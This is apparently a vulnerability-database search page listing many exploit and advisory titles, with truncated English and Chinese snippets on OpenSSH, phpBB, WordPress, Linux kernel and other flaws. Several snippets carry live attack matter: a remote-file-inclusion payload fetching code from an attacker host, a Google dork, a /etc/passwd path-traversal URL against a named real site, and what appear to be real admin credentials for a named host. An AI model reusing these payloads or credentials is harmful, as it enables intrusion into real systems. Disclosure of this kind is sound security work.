56796 matches found
Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
No description provided by source. !/bin/bash $Id: raptorsshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ raptorsshtime - OpenSSH remote timing attack exploit Copyright c 2006 Marco Ivaldi [email protected] OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately sends an erro...
phpBB XS bb_usage_stats.php远程文件包含漏洞
phpBB XS是一款基于PHP的论坛程序。 phpBB XS在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 phpBB XS的bbusagestats/includes/bbusagestats.php脚本没有正确验证phpbbrootpath参数的输入数据,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。成功攻击要求打开了registerglobals。bbusagestats.php中漏洞代码如下: line 24 include$phpbbrootpath...
phpBB Spider Friendly Module <= 1.3.10 File Include Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' | \\ | \\ | \ . . |\ \ \ /\ \ / /| || | | | | \ | \ Y / | || | | \ | \ \ / | || | |/ // / / ||| \ | / / \ / \ |\ /\ / / \ / \ | | | | / /\ \ / \ / \ | | | | / | / Y \ || / /| /| /...
UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
No description provided by source. Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id...
New Android vulnerability allows attackers to modify apps without affecting their signatures(CVE-2017-13156)
A serious vulnerability CVE-2017-13156 in Android allows attackers to modify the code in applications without affecting their signatures. The root of the problem is that a file can be a valid APK file and a valid DEX file at the same time. We have named it the Janus vulnerability, after the Roman...
ASUS wiress router Remote Command/Code Execution Vulnerability
Vulnerability Details Affected Vendor:RT-AC5300,RTAC1900P,RT-AC68U,RT-AC68P,RT-AC88U,RT-AC66U,RT-AC66UB1,RT-AC58U,RT-AC56U,RT-AC55U,RT-AC52U,RT-AC51U,RT-N18U,RT-N66U,RT-N56U,RT-AC3200,RT-AC3100,RTAC1200GU,RTAC1200G,RT-AC1200,RT-AC53,RT-N12HP,RT-N12HPB1,RT-N12D1,RT-N12+,RTN12+PRO,RT-N16,RT-N300...
Linux kernel DCCP double-free vulnerability(CVE-2017-6074)
This is an announcement about CVE-2017-6074 1 which is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged processes. Fixed on Feb 17, 2017:...
cmstop通用SQL注入漏洞(附多个大型站点案例)
简要描述: cmstop SQL注入 详细说明: 0x01:介绍 目前已服务了300多家网站,客户遍及全国30个省市,覆盖报业、杂志、广电、网媒、政府、军队和高校等多个领域,其中代表性客户包括中纪委、新华社、人民日报社、CCTV、湖北广电、中青网、千龙网、财经网、参考消息、美国侨报、ELLE和瑞丽等 0x02:分析 问题出在api这个接口当中,cmstop为闭源系统,代码已经过zend加密,并且各模块进行严格封装。。。 一次偶然的机会截获了一份代码,并解密,取出其中代码进行分析,发现一处SQL注入漏洞并发现可绕过限制对其算法进行破解(如授权限制)。。...
Rockwell Automation ControlLogix 远程拒绝服务漏洞
漏洞起因 边界条件错误影响系统Rockwell Automation Micrologix 1400 Rockwell Automation Micrologix 1100远程攻击者可以利用漏洞使设备崩溃。攻击所需条件 攻击者必须访问Rockwell Automation MicroLogix产品。漏洞信息Rockwell Automation MicroLogix是一款可编程控制器平台。 设备没有校验要拷贝到缓冲区的数据,允许远程攻击者可以向2222/TCP, 2222/UDP,...
用友某管理系统后台弱口令
简要描述: 用友某管理系统后台弱口令 详细说明: http://nczx.ufida.com.cn admin asq66a3s 漏洞证明:...
Discuz 的UCenter创始人密码可被爆破(有案例)
简要描述: 没看源码,直接黑盒测试的。非验证码识别。 so 附上利用代码+几个成功案例。 详细说明: http://192.168.1.105/discuz/ucserver/admin.php 含有一个验证码 验证码的地址为 http://localhost/discuz/ucserver/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500 但是 经过测试发现 登录ucserver的时候 如果ip第一次出现那么 seccode的默认值为cccc 而 ip地址...
FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
No description provided by source. OpenSSH 3.5p1 Remote Root Exploit for FreeBSD Discovered and Exploited By Kingcope Year 2011 -- The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the defaul...
ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability
No description provided by source. Title: ActualAnalyzer Server =8.23 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: ActualScripts URL: http://actualscripts.com ----------------------------------------------------------------- Credits...
Umbraco CMS Remote Command Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
ShopE旗下产品ECstore任意文件遍历漏洞
简要描述: ShopE旗下产品ECstore任意文件遍历漏洞 详细说明: 官方主站: http://ecstore.shopex.cn/ 在官方宣传上有成功案例: http://mall.brands.com.tw/ec http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd 漏洞证明:...
PHP OpenSSL Extension 'openssl_x509_parse()'内存破坏漏洞
BUGTRAQ ID: 64225 CVECAN ID: CVE-2013-6420 PHP 5.3.27之前版本、5.4.22之前版本、5.5.6之前版本解析x.509证书时,"asn1timetotimet"函数ext/openssl/openssl.c出错,攻击者通过特制的x.509证书利用此漏洞可破坏内存。 0 PHP PHP 5.5.x PHP PHP 5.4.x PHP PHP 5.3.x 厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.php.net...
Anymacro /reg.php SQL注入漏洞
No description provided by source...
lighttpd mod_auth模块base64 拒绝服务漏洞
CVE-2011-4362 Lighttpd是一款轻型的开放源码Web Server软件包。 lighttpd在认证数据的解码实现上存在漏洞,攻击者可能利用此漏洞使应用程序崩溃造成拒绝服务。 httpauth.c中的代码在base64解码用户输入的认证数据时使用"const char in"类型,并将每个字符转换为"int ch"作为映射表的索引,大于0x80的字符就会导致负索引,可能造成非法内存访问。 lighttpd =1.4.29 厂商补丁: LightTPD -------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
ASUS Eee PC主板BIOS SMM权限提升漏洞
BUGTRAQ ID: 35995 Eee PC是华硕推出的系列小型笔记本电脑。 华硕主板的BIOS固件包含有带有多个SMI处理器的特殊代码,在引导的时候这些处理器以系统管理模式运行并加载到受保护的内存部分(SMRAM)。 以下是其中的一个SMI处理器$SMISS处理器代码的反汇编: 0003F073: 50 push ax 0003F074: B4A1 mov ah,0A1 0003F076: 9A197D00F0 call 0F000:07D19 0003F07B: 2404 and al,004 0003F07D: 7414 je 00003F093 0003F07F: B434...
Apache Tomcat WebDav远程信息泄露漏洞
BUGTRAQ ID: 26070 CVECAN ID: CVE-2007-5461 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 Apache Tomcat在特定配置情况下存在漏洞,远程攻击者可能利用此漏洞非授权读写文件。 如果将Apache Tomcat的WebDAV servlet配置为同上下文使用且允许写访问的话,则远程攻击者可以通过提交指定了SYSTEM标签的WebDAV请求导致泄露任意文件的内容。 Apache Group Tomcat 6.0.0 - 6.0.14 Apache Group Tomcat 5.5.0 - 5.5.25 Apache...
Interstage Application Server未明跨站脚本漏洞
Interstage Application Server是一款企业级电子商务解决方案。 Interstage Application Server不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 目前没有详细漏洞细节提供。 Fujitsu INTERSTAGE Studio Standard-J Edition 8.0.1 Fujitsu INTERSTAGE Studio Enterprise Edition 8.0.1 Fujitsu INTERSTAGE Job Workload Server 8.1 Fujitsu INTERSTAGE...
Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption
No description provided by source. ------------------------------------------------------------------------------- Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption author: shinnai mail: shinnaiatautisticidotorg site: http://www.shinnai.altervista.org...
VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP(CVE-2017-10129)
VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP Platform: VirtualBox v5.1.22 r115126 x64 Tested on Windows 10 Class: Elevation of Privilege Summary: The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process givi...
WordPress REST API content injection vulnerability
1.漏洞信息: WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后,REST API插件的功能被集成到WordPress中,由此也引发了一些安全性问题。近日,一个由REST API引起的影响WorePress4.7.0和4.7.1版本的漏洞被披露,该漏洞可以导致WordPress所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章,危害巨大。 2.漏洞影响版本: WordPress 4.7.0 WordPress 4.7.1 3.复现环境: Apache2.4 PHP 7.0 WordPress 4.7.1 4.复现过程:...
PHP 'ext/phar/phar_object. c' heap overflow vulnerability, CVE-2016-4342)
Parse . tar/. zip/. phar file, the stack boundary condition control is not strict, leading to possible heap overflow. Create a new empty file"aaaa"0 byte, packaged into a "aaaa. tar"file is not compressed before the aaaa file size is 0 it. By PharFileInfo object getContent method to get the aaaa...
Spring Data JPA Blind SQL Injection Vulnerability
PoC for blind SQL injection bug found in Solita Webhack 2016. Founders: Niklas Särökaari, Joona Immonen Analysis: Arto Santala, Niklas Särökaari, Joona Immonen, Antti Virtanen, Michael Holopainen PoC: Antti Ahola, Antti Virtanen CVE: https://pivotal.io/security/cve-2016-6652 This has been fixed i...
MetInfo 5.2 /admin/include/common.inc.php 代码执行漏洞
/admin/include/common.inc.phpif!isarray$metlangadmin$GETlangset&&$GETlangset!=''die'not have this language'; if$GETlangset!='' $GETlangset=daddslashes$GETlangset,0,1; changemetcookie'languser',$GETlangset; savemetcookie; $M'user''cookie' = $metcookie; $metinfoadminname =...
TinyShop SQL注入(开启GPC,绕过过滤)
简要描述: 之前的都是找程序员的疏忽,这个位置是绕过程序的防注入。 详细说明: 环境: GPC = On public static function sql$str //过滤函数 if !getmagicquotesgpc //gpc off 就转义,把之前那个奇葩的漏洞补了 //不使用主要是因为,先有mysql的连接 //$str = mysqlrealescapestring$str; $str = addslashes$str; $str =...
Mail Manage EX 3.1.8 MMEX Script Settings Parameter Remote PHP File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10457/info Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP...
Adobe Flash Player "Button" Remote Code Execution
No description provided by source. $Id: adobeflashplayerbutton.rb 10857 2010-11-01 22:34:13Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
JForum login.page adminUsers模块iyonghu权限跨站请求伪造漏洞
CVE ID:CVE-2013-7209 JForum是采用Java开发的功能强大且稳定的论坛系统。 JForum login.page中的adminUsers模块不正确保护跨站请求伪造攻击,允许远程攻击者利用漏洞构建恶意URI,诱使用户解析,可以目标用户上下文执行恶意操作。 0 JForum 目前没有详细解决方案提供: http://jforum.net/...
Google Chrome 23.0.1271.91之前版本多个远程漏洞
BUGTRAQ ID: 56684 CVECAN ID: CVE-2012-5130,CVE-2012-5131,CVE-2012-5132,CVE-2012-5133,CVE-2012-5134,CVE-2012-5135,CVE-2012-5136 Google Chrome是由Google开发的一款设计简单、高效的Web浏览工具。 Google Chrome 23.0.1271.91之前版本在实现上存在多个远程漏洞,攻击者可利用这些漏洞在浏览器上下文中执行任意代码、造成拒绝服务、绕过同源策略等。 0 Google Chrome 23.0.1271.91 厂商补丁: Google...
DedeCMS 5.7 member/ajax_membergroup.php SQL注入漏洞
No description provided by source...
Virtual Support Office XP MyIssuesView.asp脚本远程SQL注入漏洞
BUGTRAQ ID: 28247 Virtual Support Office XP是基于Web的帮助台软件。 Virtual Support Office-XP(VSO-XP)的MyIssuesView.asp模块没有正确地验证对IssueID参数的输入便将其用到了SQL查询中,这允许远程攻击者通过提交特制的SQL查询请求执行SQL注入攻击。 Advanced Data Solutions Virtual Support Office-XP 2 Advanced Data Solutions -----------------------...
RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=- RicarGBooK 1.2.1 -=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=- Author : Dj7xpl / Dj7xplatYahoodotcom Type : Local File...
Windows: Dolby Audio X2 Service EoP (CVE-2017-7293)
Windows: Dolby Audio X2 Service Elevation of Privilege Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 on a Lenovo P50. Version of the service binary 0.7.2.61 built on 7/18/2016. Class: Elevation of Privilege Summary: The DAX2API service installed as part of the Realtek Audio Drive...
GNU tar(POINTYFEATHER) decompression path bypass vulnerability
Vulnerability analysis reference: http://paper.seebug.org/103/ Overview GNU tar' archiver can be tricked into extracting files and directories in the given destination, regardless of the path names specified on the command line. Description GNU tar' archiver attempts to avoid path traversal attac...
万户 OA系统 专业版 downloadhttp.jsp 参数fileName 任意文件下载漏洞
No description provided by source...
用友 hrss/dorado/smartweb2.RPC.d 页面 XXE 漏洞
No description provided by source...
PHPEMS一处SQL注入漏洞
简要描述: PHPEMS一处SQL注入漏洞 详细说明: 6.phpems某处存在SQL注入漏洞 存在注入漏洞的代码位置是/app/exam/app.php的exercise函数中 具体代码在靠后的位置928行左右 $questionids = $this-question-selectQuestionsByKnows$args'knowsid',$args'number',$dt;//SQL注入漏洞 这里的参数$args'knowsid' 回溯898行$args = $this-ev-get'args';可以从URL控制 然后进入函数 public function...
phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities
No description provided by source. waraxe-2013-SA103 - Multiple Vulnerabilities in phpMyAdmin =============================================================================== Author: Janek Vind waraxe Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html...
Aker Secure Mail Gateway "msg_id"跨站脚本漏洞
CVE ID:CVE-2013-6037 Aker Secure Mail Gateway是一款邮件网关解决方案。 由于通过"msgid" GET参数传递到webgui/cf/index.php的输入在返回用户前未能正确过滤,攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 0 Aker Secure Mail Gateway =2.5.2 厂商补丁: Aker ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.aker.com.br/atualizacoes-asmg?fieldtipovalue=A...
SiteServer 3.6.4 /ask/search.aspx SQL注入漏洞
No description provided by source...
ShopEx 4.8.5 /core/shop/controller/ctl.tools.php SQL注入漏洞
ShopEx 4.8.5 是一款在国内广泛使用的网上商店系统。其V4.8.5版本/core/shop/controller/ctl.tools.php文件中在67行代码处,外界传入的goods变量在未经任何过滤的情况下被拼接到SQL查询语句中,从而导致SQL注入漏洞。 ShopEx 4.8.5...
Adobe ColdFusion 验证绕过漏洞(CVE-2013-0625)
CVE ID:CVE-2013-0625 Adobe ColdFusion是一款高效的网络应用服务器开发环境 Windows, Macintosh和UNIX下的Adobe ColdFusion存在一个安全漏洞,允许未授权用户远程绕过验证控制,控制受影响的服务器。 此漏洞仅影响没有启用密码保护或没有设置密码的ColdFusion客户 0 Adobe ColdFusion 10 Adobe ColdFusion 9.0.2 Adobe ColdFusion 9.0.1 Adobe ColdFusion 9.0 厂商解决方案...
PostgreSQL 'xslt_process()'任意文件创建或覆盖漏洞
Bugtraq ID:55072 CVE ID: CVE-2012-3488 PostgreSQL是一款对象关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL解析XSLT样式表时"xsltprocess"函数存在错误,允许攻击者利用漏洞创建或覆盖任意文件。 0 PostgreSQL 8.x PostgreSQL 9.x 厂商解决方案 PostgreSQL 9.1.5, 9.0.9, 8.4.13或8.3.20已经修复此漏洞,建议用户下载使用: http://www.postgresql.org...
Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server 1. Advisory Information Title: Dnsmasq Heap Overflow and...
OpenSSL dtls1_retrieve_buffered_fragment()函数握手消息拒绝服务漏洞
BUGTRAQ ID: 35417 CVECAN ID: CVE-2009-1387 OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。 OpenSSL在接收到带有非预期序列号的握手消息时会将其传送给dtls1processoutofseqmessage函数。如果序列号低于预期值,这个函数会丢弃数据;如果为之后的消息,函数会缓冲数据。在丢弃数据时,消息碎片长度保持为0,说明没有缓冲任何数据。由于检查长度所用的错误if条件,有时会缓冲没有数据但长度为丢弃消息长度的碎片,之后在进行处理的时候会导致总线错误。 OpenSSL 0.9.x...
Linux Kernel RTL8169 NIC远程拒绝服务漏洞
Bugraq ID: 35281 CVE ID:CVE-2009-1389 CNCVE ID:CNCVE-20091389 Linux是一款开放源代码的操作系统。 Linux RTL8169驱动存在设计错误,远程攻击者可以利用漏洞使内核触发OOPs,导致拒绝服务攻击。 RTL8169 GigE卡默认配置MTU为1500字节,发送单个包超过1500字节的报文,可导致驱动处理时破坏内核内存,造成OOPs。 Linux kernel 2.6.30 rc6 Linux kernel 2.6.30 -rc5 Linux kernel 2.6.30 -rc3 Linux kernel 2.6.30...
Xitami HTTP服务器套接字HEAD请求远程拒绝服务漏洞
BUGTRAQ ID: 34681 Xitami是一款多平台,多线程的开放源码Web服务器。 远程攻击者可以通过向Xitami服务器发送多个套接字HEAD请求导致HTTP服务崩溃。 Imatix Xitami = v5.0 Imatix ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.imatix.com...